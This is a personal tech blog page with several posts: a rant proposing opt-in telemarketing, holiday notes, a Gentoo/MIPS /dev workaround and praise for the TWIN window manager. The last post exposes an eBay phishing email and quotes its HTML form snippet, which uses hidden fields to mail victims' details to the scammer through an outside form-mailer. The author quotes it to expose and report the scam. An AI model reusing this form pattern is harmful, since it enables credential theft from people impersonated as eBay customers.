Uncategorized

RANT: Telemarketers, and their opt-out calling lists.

Yep, I’m sure everybody knows what I’m on about… it’s those annoying people, that ring just as you’re about to take a bite of your hot dinner … or wake you up/disturb you in the middle of the day, to sell you something you’re not interested in.

I’ve endured it for quite some time now. Somebody rings on the landline phone (thankfully they haven’t touched my mobile), and starts their marketing blurb. Sometimes they’ll ask for a “Mr Longland” … and after further probing, maybe I can get a “D G Longland” out of them (being my father’s phone line, he’s listed in the phonebook, and this is where they get the number from). Depending on my mood, I’ll either be highly synical or flippant, or I’ll play dumb.

Each time it happens though, I still can’t help but think … they’re doing it all wrong. Just because a number is in the phone book … that doesn’t instantly give them the right to use it to make an unsolicited commercial phonecall. At the moment for us here in Australia, there are two options:

  • Request our number to be made silent. This would prohibit anyone from publishing your phone number basically. But this wouldn’t stop those call centres that just hit +6173 then throw 7 more random digits on the end. It’s also an inconvenience for people who know us.
  • Get added to the ADMA Do Not Call List. Now this will help cull calls from crowds that are a member of this association … but what about others?

I thus propose another solution.

Rather than just calling anyone, then having people opt-out of the service… instead… people should opt-in to receiving calls. This is how it’d work.

  1. A telemarketing company puts out an advert in the media (radio, TV, newspapers…etc.), listing possible service areas that people might be interested in, as well as a phone number for people to contact for more information. Let’s say for the example, this crowd are in contact with mobile phone carriers, internet providers, mortgage crowds, and a few other companies.
  2. People who are interested then ring this number. An operator (or a computer) answers, and gives them the rundown of the services available.
  3. The caller then selects the services they want, along with specifying a preferred contact phone number and times to call.
  4. The company then adds the caller to their call-list.

This has a number of advantages:

  • Their people no longer get abused by people who aren’t interested.
  • They pay less to run the companies, because fewer calls are wasted.
  • Customers here about the services they are interested in, and may attract more by word-of-mouth.

Disadvantages:

  • There’s an additional cost to pay for adverts (which is offset by fewer calls)
  • Harder for new players to become established.

Maybe if companies took this approach… fewer people would be needlessly disturbed… and they might become more successful as a result. ๐Ÿ™‚

Rellies Season starting in Brisbane

Yep… it’s that time again, the time when we’re going from one end of town, to the other, visiting numerous relatives and attending many christmas parties over the silly season.

Stinking hot weather … time with the family… perfect waterfight weather actually.

This also means I’ll be on a somewhat limited internet connection (last year, I had none at all; the phone line was that bad) and so may be partially or completely unavailable. Hopefully nothing will break in my absense, and we’ll be right. ๐Ÿ™‚

I’ll try to be online if I can; won’t be as available, but I’ll have logging going on my IRC session on toucan (nick: Redhatter-DGO on FreeNode and AustNET; Redhatter- on irc.oz.org because they’re stingy on nickname lengths). Due to the limited bandwidth, I won’t be doing much with CVS … SSH will be bad enough.

Anyways, that is all from this part of the world. Gentoo/MIPS handbook is still under review; I’ll try and make a static version of it available in my devspace shortly in case (heaven forbid) our server goes down (like it did yesterday; after a nasty storm took out our electricity for 4 hours). Other than that… Merry Christmas; see you on Boxing Day, if not before. ๐Ÿ™‚

Gentoo/MIPS Cobalt 2005.1 — missing /dev entries

Hi All,
It has been discovered that the latest 2005.1 stages appear to be missing critical /dev entries. To work around the issue… execute the following commands before exiting the chroot environment:


# cd /dev
# /sbin/MAKEDEV generic-mipsel

This should create the necessary device nodes. I shall look at rectifying the issue ASAP. Stay tuned.

TWIN: Text WINdow Manager

I’ve been using screen for a little while now. It’s a brilliant little package, but it does have some shortcomings. One being, you can only be viewing one app at a time… and it takes a little getting used to.

Anyway, I happened to mention this in #humbug (irc.oz.org)… and how it’d be nice to have an ncurses workalike that used gpm and/or keystrokes, to move text windows around. Much like having a bunch of xterms on a console. One of the people pointed me to twin a text-based window manager.

TWIN in action
(the Text WINdow Manager in action, with elinks running locally, and irssi running within a ssh session)

I’m an instant convert… now to see if this can be loaded onto dev.gentoo.org. ๐Ÿ™‚

How to NOT impersonate eBay

My god… never thought a spammer would be this stupid.

Okay, we’ve all heard of phishing I’m sure… and unfortunately in this day & age, it’s nothing unusual. However, normally it involves clicking a link, which takes you to a website where you enter your precious details.

Not this one. This one is the first I’ve seen of its kind. Here’s a screenshot of the offending email.ย  Update 20080325 — I lost the screenshot in an upgrade of the blogging software (yes, foolish me)

It’s a form. Okay, pretty smart you say… It would be, had the individual not used his/her email address in one of the hidden fields of the form. It in fact, uses a form-mailing script, and emails the form to the scammer’s email address. Here’s the relevant snippet of code (note, this is in quoted-printable encoding, I can’t be arsed fixing that.):

<FORM name=3Dform1
action=3Dhttp://webtools.snip.net/FormHandler.ashx method=3Dpost
target=3D_blank><INPUT type=3Dhidden value=3Dssconturi@yahoo.com
name=3Dxto> <INPUT type=3Dhidden value=3DAPACHE name=3Dxfrom> <INPUT
type=3Dhidden value=3DUSER name=3Dxsubject> <INPUT type=3Dhidden
value=3Dhttp://pages.ebay.com/services/buyandsell/welcome.html
name=3Dxredirect>

Notice the user’s email address? A nice letter went out to Yahoo today, as well as the ISP where the email originated, and the tech support for Snip.net, and hopefully they’ll act on this.

For those thinking of trying this sort of stunt… forget it. I seem to have a real habit of accidentally forwarding such emails to spoof@<company>… and they don’t like it when they hear someone impersonating them. For those who have received such an email… have a look on the company’s real website for places where to report the spammer.